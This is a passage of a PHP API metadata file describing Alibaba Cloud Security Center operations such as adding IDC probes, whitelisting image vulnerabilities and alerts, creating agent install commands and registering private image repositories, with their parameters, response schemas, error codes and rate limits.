'string', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'D706F2DD-FF07-576B-9DD1-0B484A9B3065', 'title' => ''], 'AddIdcProbeFailedList' => [ 'description' => 'The records of failure.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about a single record of failure.'."\n", 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server. Multiple UUIDs are separated by commas (,).'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUID.'."\n", 'type' => 'string', 'example' => '076a446d-df7d-424c-bdc5-bb5dc7f1****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'example' => '95.214.XXX.XXX', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server.'."\n", 'type' => 'string', 'example' => 'gl-sms-01', 'title' => ''], 'IdcRegion' => ['description' => 'The region ID.'."\n", 'type' => 'string', 'example' => 'Hangzhou', 'title' => ''], 'ErrorMsg' => ['description' => 'The error message that is returned.'."\n", 'type' => 'string', 'example' => 'The ResourceDirectoryId is invalid.', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server.'."\n", 'type' => 'string', 'example' => 'sas-yqcl2ck3****', 'title' => ''], 'IpSegments' => ['description' => 'The settings of the CIDR block.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX/24', 'title' => ''], 'IdcName' => ['description' => 'The name of the data center.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address.'."\n", 'type' => 'string', 'example' => '172.29.XXX.XXX', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Count\\": \\"1\\",\\n \\"RequestId\\": \\"D706F2DD-FF07-576B-9DD1-0B484A9B3065\\",\\n \\"AddIdcProbeFailedList\\": [\\n {\\n \\"Uuid\\": \\"076a446d-df7d-424c-bdc5-bb5dc7f1****\\",\\n \\"InternetIp\\": \\"95.214.XXX.XXX\\",\\n \\"InstanceName\\": \\"gl-sms-01\\",\\n \\"IdcRegion\\": \\"Hangzhou\\",\\n \\"ErrorMsg\\": \\"The ResourceDirectoryId is invalid.\\",\\n \\"InstanceId\\": \\"sas-yqcl2ck3****\\",\\n \\"IpSegments\\": \\"192.168.XX.XX/24\\",\\n \\"IdcName\\": \\"test\\",\\n \\"IntranetIp\\": \\"172.29.XXX.XXX\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'AddIdcProbe', 'description' => 'Security Center allows you to create an IDC probe only on servers on which the Security Center agent is installed.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddIdcProbe'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddIdcProbe', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AddImageEventOperation' => [ 'summary' => 'Creates an alert handling rule.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '195582', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'EventType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The alert type.'."\n" ."\n" .'* Set the value to **sensitiveFile**.'."\n", 'type' => 'string', 'required' => true, 'example' => 'sensitiveFile', 'docRequired' => true], ], [ 'name' => 'OperationCode', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The operation code.'."\n" ."\n" .'* Set the value to **whitelist** to add the alert item to the whitelist.'."\n", 'type' => 'string', 'required' => true, 'example' => 'whitelist', 'docRequired' => true], ], [ 'name' => 'Conditions', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The rule conditions. The value is in the JSON format. Valid values of keys:'."\n" ."\n" .'* **condition**: the matching condition.'."\n" .'* **type**: the matching type.'."\n" .'* **value**: the matching value.'."\n", 'type' => 'string', 'required' => true, 'example' => '[{\\"condition\\": \\"MD5\\", \\"type\\": \\"equals\\", \\"value\\": \\"0083a31cc0083a31ccf7c10367a6e783e\\"}]'."\n", 'docRequired' => true], ], [ 'name' => 'Scenarios', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The application scope of the rule. The value is in the JSON format. Valid values of keys:'."\n" ."\n" .'* **type**'."\n" .'* **value**'."\n", 'type' => 'string', 'required' => false, 'example' => '{\\"type\\": \\"repo\\", \\"value\\": \\"test-aaa/shenzhen-repo-01\\"}'."\n"], ], [ 'name' => 'EventKey', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The keyword of the alert item.'."\n", 'type' => 'string', 'required' => false, 'example' => 'PEM'], ], [ 'name' => 'EventName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the alert item.'."\n", 'type' => 'string', 'required' => false, 'example' => 'PEM'], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The source of the whitelist. Valid values:'."\n" ."\n" .'* **image**: image.'."\n" .'* **agentless**: agentless detection.'."\n", 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], [ 'name' => 'Note', 'in' => 'query', 'schema' => ['description' => 'The remarks that you want to add.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.'."\n", 'type' => 'object', 'properties' => [ 'Id' => ['title' => '', 'description' => 'The primary key of the alert handling rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '443496'], 'EventType' => ['title' => '', 'description' => 'The alert type.'."\n" ."\n" .'* Only **sensitiveFile** may be returned.'."\n", 'type' => 'string', 'example' => 'sensitiveFile'], 'OperationCode' => ['title' => '', 'description' => 'The operation code.'."\n" ."\n" .'* Only **whitelist** may be returned, which indicates that the alert item is added to the whitelist.'."\n", 'type' => 'string', 'example' => 'whitelist'], 'Conditions' => ['title' => '', 'description' => 'The rule conditions. The value is in the JSON format. Valid values of keys:'."\n" ."\n" .'* **condition**: the matching condition.'."\n" .'* **type**: the matching type.'."\n" .'* **value**: the matching value.'."\n", 'type' => 'string', 'example' => '[{\\"condition\\": \\"MD5\\", \\"type\\": \\"equals\\", \\"value\\": \\"0083a31cc0083a31ccf7c10367a6e783e\\"}]'."\n"], 'Scenarios' => ['title' => '', 'description' => 'The application scope of the rule. The value is in the JSON format. Valid values of keys:'."\n" ."\n" .'* **type**'."\n" .'* **value**'."\n", 'type' => 'string', 'example' => '{\\"type\\": \\"repo\\", \\"value\\": \\"test-aaa/shenzhen-repo-01\\"}'."\n"], 'EventKey' => ['title' => '', 'description' => 'The keyword of the alert item.'."\n", 'type' => 'string', 'example' => 'PEM'], 'EventName' => ['title' => '', 'description' => 'The name of the alert item.'."\n", 'type' => 'string', 'example' => 'PEM'], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The HTTP status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '0C8487EF-50C2-54BB-8634-10F8C35D****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Id\\": 443496,\\n \\"EventType\\": \\"sensitiveFile\\",\\n \\"OperationCode\\": \\"whitelist\\",\\n \\"Conditions\\": \\"[{\\\\\\\\\\\\\\"condition\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"MD5\\\\\\\\\\\\\\", \\\\\\\\\\\\\\"type\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"equals\\\\\\\\\\\\\\", \\\\\\\\\\\\\\"value\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"0083a31cc0083a31ccf7c10367a6e783e\\\\\\\\\\\\\\"}]\\\\n\\",\\n \\"Scenarios\\": \\"{\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"repo\\\\\\\\\\\\\\", \\\\\\\\\\\\\\"value\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"test-aaa/shenzhen-repo-01\\\\\\\\\\\\\\"}\\\\n\\",\\n \\"EventKey\\": \\"PEM\\",\\n \\"EventName\\": \\"PEM\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"0C8487EF-50C2-54BB-8634-10F8C35D****\\"\\n}","type":"json"}]', 'title' => 'AddImageEventOperation', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddImageEventOperation'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddImageEventOperation', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ImageEventOperation', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:imageeventoperation/*'], ], ], ], ], ], 'AddImageVulWhiteList' => [ 'summary' => 'Adds image vulnerabilities to the whitelist.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'create'], 'parameters' => [ [ 'name' => 'Target', 'in' => 'query', 'schema' => ['description' => 'The object on which you want to perform the operation. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **type**: the object type. The value is fixed to repo.'."\n" .'* **target**: the object content. The value is in the Namespace/Image repository format.'."\n", 'type' => 'string', 'required' => false, 'example' => '{\\"type\\":\\"repo\\",\\"target\\":[\\"sas_test/script_0209\\",\\"sas_test/script\\"]}', 'title' => ''], ], [ 'name' => 'Whitelist', 'in' => 'query', 'schema' => ['description' => 'The whitelist. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **Type**: the vulnerability type. Valid values: cve and sca.'."\n" .'* **Name**: the name of the vulnerability that is specified in Common Vulnerabilities and Exposures (CVE).'."\n" .'* **AliasName**: the alias of the vulnerability that is specified in CVE.'."\n", 'type' => 'string', 'required' => false, 'example' => '[{\\"Type\\":\\"sca\\",\\"Name\\":\\"imgsca:java:spring-core:AVD-2022-1124599\\",\\"AliasName\\":\\"Spring Framework JDK >= 9 (CVE-2022-22965)\\"}]', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the vulnerability. Valid values:'."\n" ."\n" .'* **cve**: system vulnerability'."\n" .'* **sca**: application vulnerability'."\n", 'type' => 'string', 'required' => false, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'Reason', 'in' => 'query', 'schema' => ['description' => 'The reason why you add the vulnerability to the whitelist.'."\n", 'type' => 'string', 'required' => false, 'example' => 'already config in another way', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: zh. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The source of the whitelist. Valid values:'."\n" .'- **image**'."\n" .'- **agentless**', 'type' => 'string', 'required' => false, 'example' => 'image', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'Indicates whether the image vulnerability is added to the whitelist. Valid values:'."\n" ."\n" .'* **true**: The image vulnerability is added to the whitelist.'."\n" .'* **false**: The image vulnerability is not added to the whitelist.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. A value of **200** indicates that the request was successful. Other values indicate that the request failed. You can identify the cause of the failure based on the value of this parameter.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": true,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'AddImageVulWhiteList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddImageVulWhiteList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddImageVulWhiteList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AddInstallCode' => [ 'summary' => 'Creates a command that is used to install the Security Center agent.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '91901', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group to which you want to add the asset.'."\n" ."\n" .'> You can call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to query the IDs of asset groups.'."\n", 'example' => '8076980', 'format' => 'int64', 'required' => false, 'type' => 'integer', 'title' => ''], ], [ 'name' => 'Os', 'in' => 'query', 'schema' => ['description' => 'The operating system of the asset. Default value: **linux**. Valid values:'."\n" ."\n" .'* **linux**'."\n" .'* **windows**'."\n", 'example' => 'linux', 'required' => false, 'type' => 'string', 'title' => ''], ], [ 'name' => 'ExpiredDate', 'in' => 'query', 'schema' => ['description' => 'The validity period of the installation command. The value is a 13-digit timestamp.'."\n" ."\n" .'> The installation command is valid only within the validity period. An expired installation command cannot be used to install the Security Center agent.'."\n", 'example' => '1680257463853', 'format' => 'int64', 'required' => false, 'type' => 'integer', 'title' => ''], ], [ 'name' => 'VendorName', 'in' => 'query', 'schema' => ['description' => 'The name of the service provider for the asset. Default value: **ALIYUN**.'."\n" ."\n" .'> You can call the [DescribeVendorList](~~DescribeVendorList~~) operation to query the names of service providers.'."\n", 'example' => 'ALIYUN', 'required' => false, 'type' => 'string', 'title' => ''], ], [ 'name' => 'OnlyImage', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to create an image. Default value: **false**. Valid values:'."\n" ."\n" .'* **false**: does not create an image.'."\n" .'* **true**: creates an image.', 'example' => 'false', 'required' => false, 'type' => 'boolean', 'title' => ''], ], [ 'name' => 'ProxyCluster', 'in' => 'query', 'schema' => ['description' => 'The name of the proxy cluster.'."\n", 'example' => 'proxy_test', 'required' => false, 'type' => 'string', 'title' => ''], ], [ 'name' => 'PrivateLinkId', 'in' => 'query', 'schema' => ['description' => 'The ID of the PrivateLink endpoint.'."\n", 'example' => '72845', 'format' => 'int64', 'required' => false, 'type' => 'integer', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF46038', 'type' => 'string', 'title' => ''], ], 'type' => 'object', 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF46038\\"\\n}","type":"json"}]', 'title' => 'AddInstallCode', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddInstallCode'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddInstallCode', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AddPrivateRegistry' => [ 'summary' => 'Adds a self-managed image repository.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'create'], 'parameters' => [ [ 'name' => 'RegistryType', 'in' => 'query', 'schema' => ['description' => 'The type of the private image repository. Valid values:'."\n" ."\n" .'* **harbor**'."\n" .'* **quay**'."\n", 'type' => 'string', 'required' => true, 'example' => 'harbor', 'title' => ''], ], [ 'name' => 'RegistryVersion', 'in' => 'query', 'schema' => ['description' => 'The version of the image repository. Valid values:'."\n" ."\n" .'* **V1**'."\n" .'* **V2**'."\n", 'type' => 'string', 'required' => true, 'example' => 'V2', 'title' => ''], ], [ 'name' => 'ProtocolType', 'in' => 'query', 'schema' => ['description' => 'The type of the protocol. Valid values:'."\n" ."\n" .'* **1**: HTTP'."\n" .'* **2**: HTTPS'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '2', 'title' => ''], ], [ 'name' => 'NetType', 'in' => 'query', 'schema' => ['description' => 'The network type. Valid values:'."\n" ."\n" .'* **1**: Internet'."\n" .'* **2**: virtual private cloud (VPC)'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '2', 'title' => ''], ], [ 'name' => 'VpcId', 'in' => 'query', 'schema' => ['description' => 'The ID of the VPC.'."\n", 'type' => 'string', 'required' => false, 'example' => 'vpc-wz9hs3e5*******908kd', 'title' => ''], ], [ 'name' => 'RegistryHostIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the image repository.'."\n", 'type' => 'string', 'required' => true, 'example' => '114.55.**.**', 'title' => ''], ], [ 'name' => 'DomainName', 'in' => 'query', 'schema' => ['description' => 'The domain name of the image repository.'."\n", 'type' => 'string', 'required' => true, 'example' => 'example.com', 'title' => ''], ], [ 'name' => 'UserName', 'in' => 'query', 'schema' => ['description' => 'The username that is used to log on to the image repository.'."\n", 'type' => 'string', 'required' => true, 'example' => 'xxxxx', 'title' => ''], ], [ 'name' => 'Password', 'in' => 'query', 'schema' => ['description' => 'The password that is used to log on to the image repository.'."\n", 'type' => 'string', 'required' => true, 'example' => '******', 'title' => ''], ], [ 'name' => 'RegistryRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID.'."\n" ."\n" .'> You can call the [ListImageRegistryRegion](~~ListImageRegistryRegion~~) operation to query the IDs of supported regions.'."\n", 'type' => 'string', 'required' => true, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'TransPerHour', 'in' => 'query', 'schema' => ['description' => 'The number of images that are scanned per hour.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'ExtraParam', 'in' => 'query', 'schema' => ['description' => 'The additional parameter of the image repository. This parameter is required when you set the RegistryType parameter to **quay**. Valid values:'."\n" ."\n" .'* **namespace**'."\n" .'* **authToken**'."\n", 'type' => 'string', 'required' => false, 'example' => '[{"namespace":"aa","authToken":"aa"}]', 'title' => ''], ], [ 'name' => 'Port', 'in' => 'query', 'schema' => ['description' => 'The port number.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '80', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'Data' => [ 'description' => 'The handling result.'."\n", 'type' => 'object', 'properties' => [ 'VpcId' => ['description' => 'The ID of the VPC.'."\n", 'type' => 'string', 'example' => 'vpc-2vchkxmf2j9yjt3x2****', 'title' => ''], 'Token' => ['description' => 'The value of the token.'."\n", 'type' => 'string', 'example' => '3c3c602c-fa1f-4bc0-992f-b4b2cac7****', 'title' => ''], 'TransPerHour' => ['description' => 'The number of scan tasks that are performed per hour.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'AliUid' => ['description' => 'The ID of the user.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1766185894104***', 'title' => ''], 'RegistryType' => ['description' => 'The type of the image repository. Valid values:'."\n" ."\n" .'* **harbor**'."\n" .'* **quay**'."\n", 'type' => 'string', 'example' => 'harbor', 'title' => ''], 'DomainName' => ['description' => 'The domain name of the image repository.'."\n", 'type' => 'string', 'example' => 'example.com', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the image repository.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Password' => ['description' => 'The password.'."\n", 'type' => 'string', 'example' => '***********', 'title' => ''], 'NetType' => ['description' => 'The network type. Valid values:'."\n" ."\n" .'* **1**: Internet'."\n" .'* **2**: VPC'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '2', 'title' => ''], 'RegistryVersion' => ['description' => 'The version of the image repository. Default value: -. Valid values:'."\n" ."\n" .'* **-**: the default version'."\n" .'* **V1**'."\n" .'* **V2**'."\n", 'type' => 'string', 'example' => 'V2', 'title' => ''], 'ProtocolType' => ['description' => 'The type of the protocol. Valid values:'."\n" ."\n" .'* **1**: HTTP'."\n" .'* **2**: HTTPS'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '2', 'title' => ''], 'RegistryHostIp' => ['description' => 'The IP address of the image repository.'."\n", 'type' => 'string', 'example' => '114.55.**.**', 'title' => ''], 'UserName' => ['description' => 'The username.'."\n", 'type' => 'string', 'example' => '******', 'title' => ''], 'Id' => ['description' => 'The ID of the image repository.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '273698***', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"Data\\": {\\n \\"VpcId\\": \\"vpc-2vchkxmf2j9yjt3x2****\\",\\n \\"Token\\": \\"3c3c602c-fa1f-4bc0-992f-b4b2cac7****\\",\\n \\"TransPerHour\\": 10,\\n \\"AliUid\\": 0,\\n \\"RegistryType\\": \\"harbor\\",\\n \\"DomainName\\": \\"example.com\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Password\\": \\"***********\\",\\n \\"NetType\\": 2,\\n \\"RegistryVersion\\": \\"V2\\",\\n \\"ProtocolType\\": 2,\\n \\"RegistryHostIp\\": \\"114.55.**.**\\",\\n \\"UserName\\": \\"******\\",\\n \\"Id\\": 0\\n }\\n}","type":"json"}]', 'title' => 'AddPrivateRegistry', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddPrivateRegistry'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddPrivateRegistry', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AddProtectVpcList' => [ 'summary' => 'Add or update the whitelist for VPC purchases', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '91903', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'AddVpcInstanceIdList', 'in' => 'query', 'schema' => ['description' => 'Collection of new VPC instance IDs.'."\n" .'> Call the [DescribeVpcList](~~DescribeVpcList~~) interface to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '["vpc-bp1vnpgotyzay6p5i****","vpc-bp1vnpgotyzay6p5i****"]', 'title' => ''], ], [ 'name' => 'DelVpcInstanceIdList', 'in' => 'query', 'schema' => ['description' => 'Collection of VPC instance IDs to be deleted.'."\n" .'> Call the [DescribeVpcList](~~DescribeVpcList~~) interface to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '["vpc-bp1vnpgotyzay6p5i****","vpc-bp1vnpgotyzay6p5i****"]', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => 'FD394AF6-591E-5168-8C8C-4C7847369C77', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FD394AF6-591E-5168-8C8C-4C7847369C77\\"\\n}","type":"json"}]', 'title' => 'Add or Update the Whitelist for VPC Purchases', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddProtectVpcList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddProtectVpcList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'translator' => 'machine', ], 'AddPublishBatch' => [ 'summary' => 'Upgrades the Security Center agent in batches.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '142155', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'UpgradeVersion', 'in' => 'query', 'schema' => ['description' => 'The version to which you want to upgrade the agent.'."\n", 'example' => '0.0.9', 'required' => true, 'type' => 'string', 'title' => ''], ], [ 'name' => 'BatchName', 'in' => 'query', 'schema' => ['description' => 'The name of the release batch.'."\n", 'example' => '批次1', 'required' => true, 'type' => 'string', 'title' => ''], ], [ 'name' => 'Interval', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The interval between two release batches.'."\n", 